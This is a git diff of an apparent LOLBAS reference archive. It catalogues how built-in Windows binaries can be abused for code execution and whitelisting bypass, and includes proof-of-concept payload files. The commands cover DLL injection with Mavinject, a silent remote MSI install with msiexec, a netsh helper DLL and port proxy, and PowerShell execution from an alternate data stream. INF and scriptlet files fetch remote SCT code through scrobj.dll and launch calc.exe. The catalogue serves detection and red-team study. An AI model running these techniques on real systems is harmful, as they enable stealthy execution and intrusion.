|   * C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | ||||
|   * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe | ||||
|     | ||||
| * Notes: Thanks to Casey Smith - @subtee   | ||||
|     | ||||
							
								
								
									
										23
									
								
								Archive-Old-Version/OSBinaries/Makecab.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										23
									
								
								Archive-Old-Version/OSBinaries/Makecab.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,23 @@ | ||||
| ## Makecab.exe | ||||
| * Functions: Package, Add ADS, Download | ||||
| ``` | ||||
|  | ||||
| makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab | ||||
| Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. | ||||
|  | ||||
| makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab | ||||
| Compresses the target file and stores it in the target file. | ||||
|  | ||||
| makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab | ||||
| Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\makecab.exe | ||||
|   * c:\windows\sysWOW64\makecab.exe | ||||
|     | ||||
| * Notes: Thanks to Oddvar Moe - @oddvarmoe   | ||||
|     | ||||
							
								
								
									
										22
									
								
								Archive-Old-Version/OSBinaries/Mavinject.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										22
									
								
								Archive-Old-Version/OSBinaries/Mavinject.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,22 @@ | ||||
| ## Mavinject.exe | ||||
| * Functions: Execute, Read ADS | ||||
| ``` | ||||
|  | ||||
| MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll | ||||
| Inject evil.dll into a process with PID 3110. | ||||
|  | ||||
| Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" | ||||
| Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/gN3mes1s/status/941315826107510784 | ||||
|   * https://twitter.com/Hexcorn/status/776122138063409152 | ||||
|   * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\mavinject.exe | ||||
|   * C:\Windows\SysWOW64\mavinject.exe | ||||
|     | ||||
| * Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s, Adam - @hexacorn, Oddvar Moe - @oddvarmoe   | ||||
|     | ||||
| @@ -0,0 +1,32 @@ | ||||
| <?xml version="1.0" encoding="utf-8"?> | ||||
| <CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler"> | ||||
| <files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays"> | ||||
| <d2p1:string>Microsoft.Workflow.Compiler.xoml</d2p1:string> | ||||
| </files> | ||||
| <parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler"> | ||||
| <assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | ||||
| <compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | ||||
| <coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName> | ||||
| <embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | ||||
| <evidence xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Security.Policy" i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | ||||
| <generateExecutable xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</generateExecutable> | ||||
| <generateInMemory xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">true</generateInMemory> | ||||
| <includeDebugInformation xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</includeDebugInformation> | ||||
| <linkedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | ||||
| <mainClass i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | ||||
| <outputName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></outputName> | ||||
| <tempFiles i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | ||||
| <treatWarningsAsErrors xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</treatWarningsAsErrors> | ||||
| <warningLevel xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">-1</warningLevel> | ||||
| <win32Resource i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | ||||
| <d2p1:checkTypes>false</d2p1:checkTypes> | ||||
| <d2p1:compileWithNoCode>false</d2p1:compileWithNoCode> | ||||
| <d2p1:compilerOptions i:nil="true" /> | ||||
| <d2p1:generateCCU>false</d2p1:generateCCU> | ||||
| <d2p1:languageToUse>CSharp</d2p1:languageToUse> | ||||
| <d2p1:libraryPaths xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" i:nil="true" /> | ||||
| <d2p1:localAssembly xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Reflection" i:nil="true" /> | ||||
| <d2p1:mtInfo i:nil="true" /> | ||||
| <d2p1:userCodeCCUs xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.CodeDom" i:nil="true" /> | ||||
| </parameters> | ||||
| </CompilerInput> | ||||
| @@ -0,0 +1,10 @@ | ||||
| <SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="MyWorkflow" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow"> | ||||
|     <CodeActivity x:Name="codeActivity1" /> | ||||
|     <x:Code><![CDATA[ | ||||
|     public class Foo : SequentialWorkflowActivity { | ||||
|      public Foo() { | ||||
|             Console.WriteLine("FOOO!!!!"); | ||||
|         } | ||||
|     } | ||||
|     ]]></x:Code> | ||||
| </SequentialWorkflowActivity> | ||||
							
								
								
									
										27
									
								
								Archive-Old-Version/OSBinaries/Msbuild.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										27
									
								
								Archive-Old-Version/OSBinaries/Msbuild.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,27 @@ | ||||
| ## Msbuild.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| msbuild.exe pshell.xml | ||||
| Build and execute a C# project stored in the target XML file. | ||||
|  | ||||
| msbuild.exe Msbuild.csproj | ||||
| Build and execute a C# project stored in the target CSPROJ file. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md | ||||
|   * https://github.com/Cn33liz/MSBuildShell | ||||
|   * https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/ | ||||
|   * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe | ||||
|   * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe | ||||
|   * C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe | ||||
|   * C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe | ||||
|   * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe | ||||
|   * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe | ||||
|     | ||||
| * Notes: Thanks to Casey Smith - @subtee, Cn33liz - @Cneelis   | ||||
|     | ||||
							
								
								
									
										18
									
								
								Archive-Old-Version/OSBinaries/Msconfig.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										18
									
								
								Archive-Old-Version/OSBinaries/Msconfig.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,18 @@ | ||||
| ## Msconfig.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| Msconfig.exe -5 | ||||
| Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/pabraeken/status/991314564896690177 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\msconfig.exe | ||||
|     | ||||
| * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken | ||||
| See the Payloads folder for an example mscfgtlc.xml file. | ||||
|    | ||||
|     | ||||
							
								
								
									
										24
									
								
								Archive-Old-Version/OSBinaries/Msdt.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										24
									
								
								Archive-Old-Version/OSBinaries/Msdt.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,24 @@ | ||||
| ## Msdt.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| Open .diagcab package | ||||
|  | ||||
|  | ||||
| msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE | ||||
| Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/ | ||||
|   * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ | ||||
|   * https://twitter.com/harr0ey/status/991338229952598016 | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\Msdt.exe     | ||||
|   * C:\Windows\SysWOW64\Msdt.exe     | ||||
|     | ||||
| * Notes: Thanks to: | ||||
| See the Payloads folder for an example PCW8E57.xml file. | ||||
|    | ||||
|     | ||||
							
								
								
									
										27
									
								
								Archive-Old-Version/OSBinaries/Msiexec.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										27
									
								
								Archive-Old-Version/OSBinaries/Msiexec.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,27 @@ | ||||
| ## Msiexec.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| msiexec /quiet /i cmd.msi | ||||
| Installs the target .MSI file silently. | ||||
|  | ||||
| msiexec /q /i http://192.168.100.3/tmp/cmd.png | ||||
| Installs the target remote & renamed .MSI file silently. | ||||
|  | ||||
| msiexec /y "C:\folder\evil.dll" | ||||
| Calls DLLRegisterServer to register the target DLL. | ||||
|  | ||||
| msiexec /z "C:\folder\evil.dll" | ||||
| Calls DLLRegisterServer to un-register the target DLL. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/ | ||||
|   * https://twitter.com/PhilipTsukerman/status/992021361106268161 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\msiexec.exe | ||||
|   * c:\windows\sysWOW64\msiexec.exe | ||||
|     | ||||
| * Notes: Thanks to ? - @netbiosX, PhilipTsukerman - @PhilipTsukerman   | ||||
|     | ||||
							
								
								
									
										27
									
								
								Archive-Old-Version/OSBinaries/Netsh.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										27
									
								
								Archive-Old-Version/OSBinaries/Netsh.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,27 @@ | ||||
| ## Netsh.exe | ||||
| * Functions: Execute, Surveillance | ||||
| ``` | ||||
|  | ||||
| netsh.exe trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl IPv4.Address=!(<IPofRemoteFileShare>) | ||||
| netsh.exe trace show status | ||||
|  | ||||
| Capture network traffic on remote file share. | ||||
|  | ||||
| netsh.exe add helper C:\Path\file.dll | ||||
| Load (execute) NetSh.exe helper DLL file. | ||||
|  | ||||
| netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | ||||
| Forward traffic from the listening address and proxy to a remote system. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md | ||||
|   * https://attack.mitre.org/wiki/Technique/T1128 | ||||
|   * https://twitter.com/teemuluotio/status/990532938952527873 | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32 | ||||
|   * C:\Windows\SysWOW64 | ||||
|     | ||||
| * Notes:    | ||||
|     | ||||
							
								
								
									
										17
									
								
								Archive-Old-Version/OSBinaries/Nltest.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										17
									
								
								Archive-Old-Version/OSBinaries/Nltest.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,17 @@ | ||||
| ## Nltest.exe | ||||
| * Functions: Credentials | ||||
| ``` | ||||
|  | ||||
| nltest.exe /SERVER:192.168.1.10 /QUERY | ||||
|  | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/sysopfb/status/986799053668139009 | ||||
|   * https://ss64.com/nt/nltest.html | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\nltest.exe | ||||
|     | ||||
| * Notes: Thanks to Sysopfb - @sysopfb   | ||||
|     | ||||
							
								
								
									
										20
									
								
								Archive-Old-Version/OSBinaries/Openwith.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										20
									
								
								Archive-Old-Version/OSBinaries/Openwith.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,20 @@ | ||||
| ## Openwith.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| OpenWith.exe /c C:\test.hta | ||||
| Opens the target file with the default application. | ||||
|  | ||||
| OpenWith.exe /c C:\testing.msi | ||||
| Opens the target file with the default application. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/harr0ey/status/991670870384021504 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\Openwith.exe | ||||
|   * c:\windows\sysWOW64\Openwith.exe | ||||
|     | ||||
| * Notes: Thanks to Matt harr0ey - @harr0ey   | ||||
|     | ||||
							
								
								
									
										14
									
								
								Archive-Old-Version/OSBinaries/Payload/Cmstp.inf
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										14
									
								
								Archive-Old-Version/OSBinaries/Payload/Cmstp.inf
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,14 @@ | ||||
| [version] | ||||
| Signature=$chicago$ | ||||
| AdvancedINF=2.5 | ||||
|  | ||||
| [DefaultInstall_SingleUser] | ||||
| UnRegisterOCXs=UnRegisterOCXSection | ||||
|  | ||||
| [UnRegisterOCXSection] | ||||
| %11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp_calc.sct | ||||
|  | ||||
| [Strings] | ||||
| AppAct = "SOFTWARE\Microsoft\Connection Manager" | ||||
| ServiceName="Yay" | ||||
| ShortSvcName="Yay" | ||||
							
								
								
									
										23
									
								
								Archive-Old-Version/OSBinaries/Payload/Cmstp_calc.sct
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										23
									
								
								Archive-Old-Version/OSBinaries/Payload/Cmstp_calc.sct
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,23 @@ | ||||
| <?XML version="1.0"?> | ||||
| <scriptlet> | ||||
| <registration  | ||||
|     progid="PoC" | ||||
|     classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | ||||
| 	<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll --> | ||||
|  | ||||
| 	<!-- .sct files when downloaded, are executed from a path like this --> | ||||
| 	<!-- Please Note, file extenstion does not matter --> | ||||
| 	<!-- Though, the name and extension are arbitary.. --> | ||||
| 	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct --> | ||||
| 	<!-- Based on current research, no registry keys are written, since call "uninstall" --> | ||||
|   	<!-- You can either execute locally, or from a url --> | ||||
| 	<script language="JScript"> | ||||
| 		<![CDATA[ | ||||
| 	    		// calc.exe should launch, this could be any arbitrary code. | ||||
|       	   		// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation | ||||
| 			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");	 | ||||
| 	 | ||||
| 		]]> | ||||
| </script> | ||||
| </registration> | ||||
| </scriptlet> | ||||
							
								
								
									
										8
									
								
								Archive-Old-Version/OSBinaries/Payload/Evil.xbap
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										8
									
								
								Archive-Old-Version/OSBinaries/Payload/Evil.xbap
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,8 @@ | ||||
| private void Button_click(object sender, RoutedEventArgs e) | ||||
| { | ||||
| 	if (RadioButton1.IsChecked == true) | ||||
| 	{ | ||||
| 		Process.Start("C:\\poc\\evil.exe"); | ||||
| 		MessageBox.Show("BHello."); | ||||
| 	} | ||||
| } | ||||
| @@ -0,0 +1,8 @@ | ||||
| [Version]  | ||||
| Signature=$CHICAGO$ | ||||
|  | ||||
| [DefaultInstall] | ||||
| UnregisterDlls = Squiblydoo | ||||
|  | ||||
| [Squiblydoo] | ||||
| 11,,scrobj.dll,2,60,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Infdefaultinstall_calc.sct | ||||
| @@ -0,0 +1,16 @@ | ||||
| <?XML version="1.0"?> | ||||
| <scriptlet> | ||||
| <registration  | ||||
|     progid="PoC" | ||||
|     classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | ||||
| 	<!-- Proof Of Concept - Casey Smith @subTee --> | ||||
| 	<!--  License: BSD3-Clause --> | ||||
| 	<script language="JScript"> | ||||
| 		<![CDATA[ | ||||
| 	 | ||||
| 			var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); | ||||
| 	 | ||||
| 		]]> | ||||
| </script> | ||||
| </registration> | ||||
| </scriptlet> | ||||
							
								
								
									
										47
									
								
								Archive-Old-Version/OSBinaries/Payload/Msbuild.csproj
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										47
									
								
								Archive-Old-Version/OSBinaries/Payload/Msbuild.csproj
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,47 @@ | ||||
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | ||||
|   <!-- This inline task executes c# code. --> | ||||
|   <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildBypass.csproj --> | ||||
|   <!-- Feel free to use a more aggressive class for testing. --> | ||||
|   <Target Name="Hello"> | ||||
|    <FragmentExample /> | ||||
|    <ClassExample /> | ||||
|   </Target> | ||||
|   <UsingTask | ||||
|     TaskName="FragmentExample" | ||||
|     TaskFactory="CodeTaskFactory" | ||||
|     AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > | ||||
|     <ParameterGroup/> | ||||
|     <Task> | ||||
|       <Using Namespace="System" />   | ||||
|       <Code Type="Fragment" Language="cs"> | ||||
|         <![CDATA[ | ||||
| 			    Console.WriteLine("Hello From a Code Fragment");		 | ||||
|         ]]> | ||||
|       </Code> | ||||
|     </Task> | ||||
| 	</UsingTask> | ||||
| 	<UsingTask | ||||
|     TaskName="ClassExample" | ||||
|     TaskFactory="CodeTaskFactory" | ||||
|     AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > | ||||
| 	<Task> | ||||
| 	<!-- <Reference Include="System.IO" /> Example Include -->		 | ||||
|       <Code Type="Class" Language="cs"> | ||||
|         <![CDATA[ | ||||
| 			using System; | ||||
| 			using Microsoft.Build.Framework; | ||||
| 			using Microsoft.Build.Utilities; | ||||
| 				 | ||||
| 			public class ClassExample :  Task, ITask | ||||
| 			{ | ||||
| 				public override bool Execute() | ||||
| 				{ | ||||
| 					Console.WriteLine("Hello From a Class."); | ||||
| 					return true; | ||||
| 				} | ||||
| 			} | ||||
|         ]]> | ||||
|       </Code> | ||||
|     </Task> | ||||
|   </UsingTask> | ||||
| </Project> | ||||
							
								
								
									
										43
									
								
								Archive-Old-Version/OSBinaries/Payload/Mshta_calc.sct
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										43
									
								
								Archive-Old-Version/OSBinaries/Payload/Mshta_calc.sct
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,43 @@ | ||||
| <?XML version="1.0"?> | ||||
| <scriptlet> | ||||
|  | ||||
| <registration | ||||
|     description="Bandit" | ||||
|     progid="Bandit" | ||||
|     version="1.00" | ||||
|     classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | ||||
| 	> | ||||
|  | ||||
| 	<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll | ||||
| 	<!-- DFIR --> | ||||
| 	<!--		.sct files are downloaded and executed from a path like this --> | ||||
| 	<!-- Though, the name and extension are arbitary.. --> | ||||
| 	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct --> | ||||
| 	<!-- Based on current research, no registry keys are written, since call "uninstall" --> | ||||
|  | ||||
|  | ||||
| 	<!-- Proof Of Concept - Casey Smith @subTee --> | ||||
| 	<script language="JScript"> | ||||
| 		<![CDATA[ | ||||
|  | ||||
| 			var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); | ||||
|  | ||||
| 		]]> | ||||
| 	</script> | ||||
| </registration> | ||||
|  | ||||
| <public> | ||||
|     <method name="Exec"></method> | ||||
| </public> | ||||
| <script language="JScript"> | ||||
| <![CDATA[ | ||||
|  | ||||
| 	function Exec() | ||||
| 	{ | ||||
| 		var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); | ||||
| 	} | ||||
|  | ||||
| ]]> | ||||
| </script> | ||||
|  | ||||
| </scriptlet> | ||||
							
								
								
									
										13
									
								
								Archive-Old-Version/OSBinaries/Payload/PCW8E57.xml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										13
									
								
								Archive-Old-Version/OSBinaries/Payload/PCW8E57.xml
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,13 @@ | ||||
|  | ||||
| <?xml version="1.0" encoding="utf-16"?> | ||||
| <Answers Version="1.0"> | ||||
| 	<Interaction ID="IT_LaunchMethod"> | ||||
| 		<Value>ContextMenu</Value> | ||||
| 	</Interaction> | ||||
| 	<Interaction ID="IT_SelectProgram"> | ||||
| 		<Value>NotListed</Value> | ||||
| 	</Interaction> | ||||
| 	<Interaction ID="IT_BrowseForFile"> | ||||
| 		<Value>C:\Windows\assembly\Exec-Execute.msi</Value> | ||||
| 	</Interaction> | ||||
| </Answers> | ||||
							
								
								
									
										23
									
								
								Archive-Old-Version/OSBinaries/Payload/Regsvr32_calc.sct
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										23
									
								
								Archive-Old-Version/OSBinaries/Payload/Regsvr32_calc.sct
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,23 @@ | ||||
| <?XML version="1.0"?> | ||||
| <scriptlet> | ||||
| <registration  | ||||
|     progid="PoC" | ||||
|     classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | ||||
| 	<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll --> | ||||
|  | ||||
| 	<!-- .sct files when downloaded, are executed from a path like this --> | ||||
| 	<!-- Please Note, file extenstion does not matter --> | ||||
| 	<!-- Though, the name and extension are arbitary.. --> | ||||
| 	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct --> | ||||
| 	<!-- Based on current research, no registry keys are written, since call "uninstall" --> | ||||
|   	<!-- You can either execute locally, or from a url --> | ||||
| 	<script language="JScript"> | ||||
| 		<![CDATA[ | ||||
| 	    		// calc.exe should launch, this could be any arbitrary code. | ||||
|       	   		// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation | ||||
| 			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");	 | ||||
| 	 | ||||
| 		]]> | ||||
| </script> | ||||
| </registration> | ||||
| </scriptlet> | ||||
							
								
								
									
										11
									
								
								Archive-Old-Version/OSBinaries/Payload/Wmic_calc.xsl
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										11
									
								
								Archive-Old-Version/OSBinaries/Payload/Wmic_calc.xsl
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,11 @@ | ||||
| <?xml version='1.0'?> | ||||
| <stylesheet | ||||
| xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" | ||||
| xmlns:user="placeholder" | ||||
| version="1.0"> | ||||
| <output method="text"/> | ||||
| 	<ms:script implements-prefix="user" language="JScript"> | ||||
| 	<![CDATA[ | ||||
| 	var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); | ||||
| 	]]> </ms:script> | ||||
| </stylesheet> | ||||
							
								
								
									
										1
									
								
								Archive-Old-Version/OSBinaries/Payload/file.rsp
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										1
									
								
								Archive-Old-Version/OSBinaries/Payload/file.rsp
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1 @@ | ||||
| REGSVR evil.dll | ||||
							
								
								
									
										4
									
								
								Archive-Old-Version/OSBinaries/Payload/mscfgtlc.xml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										4
									
								
								Archive-Old-Version/OSBinaries/Payload/mscfgtlc.xml
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,4 @@ | ||||
| <?xml version="1.0" ?> | ||||
| <MSCONFIGTOOLS> | ||||
| <a NAME="LOLBin" PATH="%windir%\System32\WindowsPowerShell\v1.0\powershell.exe" DEFAULT_OPT="-nop -sta -enc -w 1 <BASE64ENCCOMMAND>" ADV_OPT="-command calc.exe" HELP="LOLBin MSCONFIGTOOLS"/> | ||||
| </MSCONFIGTOOLS> | ||||
							
								
								
									
										25
									
								
								Archive-Old-Version/OSBinaries/Pcalua.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										25
									
								
								Archive-Old-Version/OSBinaries/Pcalua.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,25 @@ | ||||
| ## Pcalua.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| pcalua.exe -a calc.exe | ||||
| Open the target .EXE using the Program Compatibility Assistant. | ||||
|  | ||||
| pcalua.exe -a \\server\payload.dll | ||||
| Open the target .DLL file with the Program Compatibilty Assistant. | ||||
|  | ||||
| pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java | ||||
| Open the target .CPL file with the Program Compatibility Assistant. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/KyleHanslovan/status/912659279806640128 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\pcalua.exe | ||||
|     | ||||
| * Notes: Thanks to: | ||||
| fab - @0rbz_ | ||||
| Kyle Hanslovan - @KyleHanslovan | ||||
|    | ||||
|     | ||||
							
								
								
									
										16
									
								
								Archive-Old-Version/OSBinaries/Pcwrun.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										16
									
								
								Archive-Old-Version/OSBinaries/Pcwrun.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,16 @@ | ||||
| ## Pcwrun.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| Pcwrun.exe c:\temp\beacon.exe | ||||
| Open the target .EXE file with the Program Compatibility Wizard. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/pabraeken/status/991335019833708544 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\pcwrun.exe | ||||
|     | ||||
| * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken   | ||||
|     | ||||
							
								
								
									
										17
									
								
								Archive-Old-Version/OSBinaries/Powershell.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										17
									
								
								Archive-Old-Version/OSBinaries/Powershell.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,17 @@ | ||||
| ## Powershell.exe | ||||
| * Functions: Execute, Read ADS | ||||
| ``` | ||||
|  | ||||
| powershell -ep bypass - < c:\temp:ttt | ||||
| Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS). | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/Moriarty_Meng/status/984380793383370752 | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | ||||
